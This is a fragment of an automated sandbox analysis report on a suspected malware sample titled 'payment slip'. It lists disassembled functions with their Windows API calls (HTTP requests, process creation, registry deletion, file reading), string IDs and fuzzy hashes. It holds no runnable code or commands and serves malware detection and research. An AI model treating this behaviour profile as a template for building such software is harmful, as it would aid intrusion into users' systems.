                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                        • API String ID: 176396367-1603158881
                                        • Opcode ID: 548552615f32adccbf7a4d77a95364185242cd4f90822221bebc20ebe1ec2a9a
                                        • Instruction ID: d9c113e501bed63093dcfc18b3b8c2fc00c6abb5e29ecc3af2bc6900faf9c858
                                        • Opcode Fuzzy Hash: 548552615f32adccbf7a4d77a95364185242cd4f90822221bebc20ebe1ec2a9a
                                        • Instruction Fuzzy Hash: C3E1D332A00516ABCF689FA8C8417FEBBF4BF44710F558129E556A7241DB30AF85AF90
                                        Function 000A44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharLowerBuffW.USER32(00000000,00000000,000CCC08), ref: 000A4527
                                        • _wcslen.LIBCMT ref: 000A453B
                                        • _wcslen.LIBCMT ref: 000A4599
                                        • _wcslen.LIBCMT ref: 000A45F4
                                        • _wcslen.LIBCMT ref: 000A463F
                                        • _wcslen.LIBCMT ref: 000A46A7
                                          • Part of subcall function 0004F9F2: _wcslen.LIBCMT ref: 0004F9FD
                                        • GetDriveTypeW.KERNEL32(?,000F6BF0,00000061), ref: 000A4743
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _wcslen$BuffCharDriveLowerType
                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                        • API String ID: 2055661098-1000479233
                                        • Opcode ID: adddfc66d5afbd216184b1093025e83866136dbb2488ab5875b665e6142caa43
                                        • Instruction ID: d2a1812bbd474e24972d53bb10db3e7d02090945e7a4ff1ccd70960f7ef4f7e9
                                        • Opcode Fuzzy Hash: adddfc66d5afbd216184b1093025e83866136dbb2488ab5875b665e6142caa43
                                        • Instruction Fuzzy Hash: 10B113396083029FC720DF68C891ABEB7E5AFE6724F50491DF596C7292D7B0D884CB52
                                        Function 000C6CD9 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 194windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DestroyWindow.USER32(?,?), ref: 000C6DEB
                                          • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 000C6E5F
                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 000C6E81
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000C6E94
                                        • DestroyWindow.USER32(?), ref: 000C6EB5
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00030000,00000000), ref: 000C6EE4
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000C6EFD
                                        • GetDesktopWindow.USER32 ref: 000C6F16
                                        • GetWindowRect.USER32(00000000), ref: 000C6F1D
                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 000C6F35
                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 000C6F4D
                                          • Part of subcall function 00049944: GetWindowLongW.USER32(?,000000EB), ref: 00049952
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                        • String ID: U$0$tooltips_class32
                                        • API String ID: 2429346358-3917125686
                                        • Opcode ID: 91d13ae90adc0093fd39a620bee8aee1170fd3025f0364d5873497be6267cfd6
                                        • Instruction ID: b017b32c78e96bad3adf4aecd18c57a2643719f05fcddfc59068efa8916e4db6
                                        • Opcode Fuzzy Hash: 91d13ae90adc0093fd39a620bee8aee1170fd3025f0364d5873497be6267cfd6
                                        • Instruction Fuzzy Hash: 55716774104244AFEB21CF18DC48FAABBF9FF89304F04042EF98A87261C776A946DB11
                                        Function 000C911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                        • DragQueryPoint.SHELL32(?,?), ref: 000C9147
                                          • Part of subcall function 000C7674: ClientToScreen.USER32(?,?), ref: 000C769A
                                          • Part of subcall function 000C7674: GetWindowRect.USER32(?,?), ref: 000C7710
                                          • Part of subcall function 000C7674: PtInRect.USER32(?,?,000C8B89), ref: 000C7720
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 000C91B0
                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 000C91BB
                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 000C91DE
                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 000C9225
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 000C923E
                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 000C9255
                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 000C9277
                                        • DragFinish.SHELL32(?), ref: 000C927E
                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 000C9371
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                        • String ID: U$@GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                        • API String ID: 221274066-757269100
                                        • Opcode ID: 3c4183e1184e2b86dc3fd9c54495973467a131d37223a7c5dd71cd7ab9f230ae
                                        • Instruction ID: 52f470cfe74db63665b0c585fe9429c552b44cc340035f33e815f0eee2c589a2
                                        • Opcode Fuzzy Hash: 3c4183e1184e2b86dc3fd9c54495973467a131d37223a7c5dd71cd7ab9f230ae
                                        • Instruction Fuzzy Hash: 22617A71108301AFE701DF64DC89EAFBBE8FF89750F00092EF595921A1DB709A49CB52
                                        Function 000BAFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 000BB198
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 000BB1B0
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 000BB1D4
                                        • _wcslen.LIBCMT ref: 000BB200
                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 000BB214
                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 000BB236
                                        • _wcslen.LIBCMT ref: 000BB332
                                          • Part of subcall function 000A05A7: GetStdHandle.KERNEL32(000000F6), ref: 000A05C6
                                        • _wcslen.LIBCMT ref: 000BB34B
                                        • _wcslen.LIBCMT ref: 000BB366
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 000BB3B6
                                        • GetLastError.KERNEL32(00000000), ref: 000BB407
                                        • CloseHandle.KERNEL32(?), ref: 000BB439
                                        • CloseHandle.KERNEL32(00000000), ref: 000BB44A
                                        • CloseHandle.KERNEL32(00000000), ref: 000BB45C
                                        • CloseHandle.KERNEL32(00000000), ref: 000BB46E
                                        • CloseHandle.KERNEL32(?), ref: 000BB4E3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                        • String ID:
                                        • API String ID: 2178637699-0
                                        • Opcode ID: a6ba4af10969e5a060b3a287bf397e3c9d09e49e1781ee658aa31fc2d50c0d6a
                                        • Instruction ID: 135386c8dc5a5162f8c728620feaeed5f677bc5b09857b3296003816d7d3a34d
                                        • Opcode Fuzzy Hash: a6ba4af10969e5a060b3a287bf397e3c9d09e49e1781ee658aa31fc2d50c0d6a
                                        • Instruction Fuzzy Hash: CAF19C716083009FD725EF24C891BAEBBE5AF85714F14895DF8998B2A2CB71EC44CB52
                                        Function 0003326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetMenuItemCount.USER32(00101990), ref: 00072F8D
                                        • GetMenuItemCount.USER32(00101990), ref: 0007303D
                                        • GetCursorPos.USER32(?), ref: 00073081
                                        • SetForegroundWindow.USER32(00000000), ref: 0007308A
                                        • TrackPopupMenuEx.USER32(00101990,00000000,?,00000000,00000000,00000000), ref: 0007309D
                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 000730A9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                        • String ID: 0
                                        • API String ID: 36266755-4108050209
                                        • Opcode ID: 1f2a634f45a69c04a7e2686254b7c986d3c6eb29ff310ab21e6841510e9a96c8
                                        • Instruction ID: b760cad8f79e3e058591422984d926217442d5ecc026d8ff45c8b50e09cce0ef
                                        • Opcode Fuzzy Hash: 1f2a634f45a69c04a7e2686254b7c986d3c6eb29ff310ab21e6841510e9a96c8
                                        • Instruction Fuzzy Hash: 44710970A44205BEFB319F24CC89F9EBFA8FF04324F208226F5186A1E1C7B5A950D794
                                        Function 000C541D Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 191windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 000C5504
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000C5515
                                        • CharNextW.USER32(00000158), ref: 000C5544
                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 000C5585
                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 000C559B
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000C55AC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend$CharNext
                                        • String ID: U$more than two branches
                                        • API String ID: 1350042424-2723945405
                                        • Opcode ID: 56edf5c68b727cfea2674cfa3f168c9bad3059be28798056aac6bbc2e4b99394
                                        • Instruction ID: 77b2b532268f8cca6a525c7ceb926acad27a4b7f9afcf1057e45b79ad79c2495
                                        • Opcode Fuzzy Hash: 56edf5c68b727cfea2674cfa3f168c9bad3059be28798056aac6bbc2e4b99394
                                        • Instruction Fuzzy Hash: 58619038904608AFEF208F54CC84EFF7BB9EB09726F104149F525A7291D774AAC1DB60
                                        Function 00048BCD Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168timeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00048F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00048BE8,?,00000000,?,?,?,?,00048BBA,00000000,?), ref: 00048FC5
                                        • DestroyWindow.USER32(?), ref: 00048C81
                                        • KillTimer.USER32(00000000,?,?,?,?,00048BBA,00000000,?), ref: 00048D1B
                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00086973
                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00048BBA,00000000,?), ref: 000869A1
                                        • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00048BBA,00000000,?), ref: 000869B8
                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00048BBA,00000000), ref: 000869D4
                                        • DeleteObject.GDI32(00000000), ref: 000869E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                        • String ID: U
                                        • API String ID: 641708696-2399391058
                                        • Opcode ID: 59058e88521bb4f40436b19b9e156708a4c6ca31db200dcc2bbb148da9c8f61e
                                        • Instruction ID: b708711d5dcd142c9c273a3fe36a910396930281fd33be29a12bfc598ebf2fbc
                                        • Opcode Fuzzy Hash: 59058e88521bb4f40436b19b9e156708a4c6ca31db200dcc2bbb148da9c8f61e
                                        • Instruction Fuzzy Hash: C3618F70502610EFDB35AF14D988B2D77F1FB40316F15892DE086979A0CB7AA9C0CF59
                                        Function 000AC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000AC4B0
                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 000AC4C3
                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 000AC4D7
                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 000AC4F0
                                        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 000AC533
                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 000AC549
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000AC554
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 000AC584
                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 000AC5DC
                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 000AC5F0
                                        • InternetCloseHandle.WININET(00000000), ref: 000AC5FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                        • String ID:
                                        • API String ID: 3800310941-3916222277
                                        • Opcode ID: 1f7fabff16f2035fe4700e455e621be117cf2b7f4995371c366ebf397a907563
                                        • Instruction ID: 11b651ea5bc8e67933e2d4d2cb9fd2c4018ef2b4f1ea5e0a2fa157deb7b4f59b
                                        • Opcode Fuzzy Hash: 1f7fabff16f2035fe4700e455e621be117cf2b7f4995371c366ebf397a907563
                                        • Instruction Fuzzy Hash: FE516DB0500604BFFB218FA0C948EAB7BFCFF09744F014519F94A96610DB34E944DB60
                                        Function 00049838 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 137COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00049944: GetWindowLongW.USER32(?,000000EB), ref: 00049952
                                        • GetSysColor.USER32(0000000F), ref: 00049862
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ColorLongWindow
                                        • String ID: U
                                        • API String ID: 259745315-2399391058
                                        • Opcode ID: 83898bba1e98336476fbe5ff62aae0cca45a9328caac1acd9ddffa782cd03ad3
                                        • Instruction ID: d3703ca40d5d1052f4d57c946c56ec68ed54d76aedda3dbd9d73367a23782f0e
                                        • Opcode Fuzzy Hash: 83898bba1e98336476fbe5ff62aae0cca45a9328caac1acd9ddffa782cd03ad3
                                        • Instruction Fuzzy Hash: 32417271104640AFEB205B3DDC44FBA3BA5BB06330F284669FAA6871E5DB759C42DB24
                                        Function 000C856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 000C8592
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 000C85A2
                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 000C85AD
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 000C85BA
                                        • GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 000C85C8
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 000C85D7
                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 000C85E0
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 000C85E7
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 000C85F8
                                        • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,000CFC38,?), ref: 000C8611
                                        • GlobalFree.KERNEL32(00000000), ref: 000C8621
                                        • GetObjectW.GDI32(?,00000018,?), ref: 000C8641
                                        • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 000C8671
                                        • DeleteObject.GDI32(?), ref: 000C8699
                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 000C86AF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                        • String ID:
                                        • API String ID: 3840717409-0
                                        • Opcode ID: 7ef429d8cf9316a65b0a1cd253b75e7c67077e488775c452ec1867f5034f1a5f
                                        • Instruction ID: 32152631a708fe18898ae450fa3a062024e5e919e0ada5931f875db4321d4c9d
                                        • Opcode Fuzzy Hash: 7ef429d8cf9316a65b0a1cd253b75e7c67077e488775c452ec1867f5034f1a5f
                                        • Instruction Fuzzy Hash: BF410A75600204BFEB119FA5DD88EAE7BB8FF89711F148058F909E7260DB749D01DB64
                                        Function 000A14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VariantInit.OLEAUT32(00000000), ref: 000A1502
                                        • VariantCopy.OLEAUT32(?,?), ref: 000A150B
                                        • VariantClear.OLEAUT32(?), ref: 000A1517
                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 000A15FB
                                        • VarR8FromDec.OLEAUT32(?,?), ref: 000A1657
                                        • VariantInit.OLEAUT32(?), ref: 000A1708
                                        • SysFreeString.OLEAUT32(?), ref: 000A178C
                                        • VariantClear.OLEAUT32(?), ref: 000A17D8
                                        • VariantClear.OLEAUT32(?), ref: 000A17E7
                                        • VariantInit.OLEAUT32(00000000), ref: 000A1823
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                        • API String ID: 1234038744-3931177956
                                        • Opcode ID: 8c44fad5b39a1136eae997b95d333485897a1f87b48dcf84d5e24fbacd6b4de8
                                        • Instruction ID: bc6d2083f92c7e82dcec5c2161a838949098f11ef6d39a15563569aeb92b7912
                                        • Opcode Fuzzy Hash: 8c44fad5b39a1136eae997b95d333485897a1f87b48dcf84d5e24fbacd6b4de8
                                        • Instruction Fuzzy Hash: FCD10E71E00A05EBEB209FA4D895BFDB7B5BF46700F10806AE456AF181DB30EC41DBA1
                                        Function 000BB60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                          • Part of subcall function 000BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000BB6AE,?,?), ref: 000BC9B5
                                          • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BC9F1
                                          • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA68
                                          • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA9E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000BB6F4
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000BB772
                                        • RegDeleteValueW.ADVAPI32(?,?), ref: 000BB80A
                                        • RegCloseKey.ADVAPI32(?), ref: 000BB87E
                                        • RegCloseKey.ADVAPI32(?), ref: 000BB89C
                                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 000BB8F2
                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 000BB904
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 000BB922
                                        • FreeLibrary.KERNEL32(00000000), ref: 000BB983
                                        • RegCloseKey.ADVAPI32(00000000), ref: 000BB994
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                        • API String ID: 146587525-4033151799
